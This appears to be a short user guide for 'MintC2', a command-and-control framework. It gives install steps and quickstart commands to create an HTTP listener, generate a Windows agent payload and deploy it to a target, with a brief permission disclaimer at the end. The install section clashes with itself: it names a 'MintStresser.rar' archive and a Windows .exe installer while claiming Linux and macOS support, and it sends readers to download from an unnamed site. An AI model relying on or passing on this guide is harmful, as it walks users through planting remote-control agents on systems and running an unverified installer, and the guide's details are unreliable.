Complete guide to using and understanding the MintC2 framework
Installation
MintC2 can be installed quickly by downloading and extracting the installation package:
# Download the MintC2 package from our website
# Extract MintStresser.rar to a location of your choice
# Run the installer
MintC2_Setup.exe
# Follow the on-screen instructions
# Accept the license agreement
# Select installation directory
# Choose components to install
For convenience, you can also download MintC2 directly.
System requirements:
- Windows 10/11, Linux (Debian/Ubuntu/CentOS), or macOS 10.15+
- 64-bit operating system
- 2GB RAM minimum (4GB recommended)
- 500MB disk space
- Administrator/root privileges
Quickstart Guide
Get started with MintC2 in minutes:
- Launch the MintC2 console by running
mintc2
in your terminal - Set up a listener with
listener create -t http -p 8080
- Generate a payload with
payload generate -t windows -o agent.exe
- Deploy the payload to your target (for testing purposes only)
- Manage connections in the MintC2 console
Always ensure you have explicit permission to deploy payloads on any system. Unauthorized use is illegal.
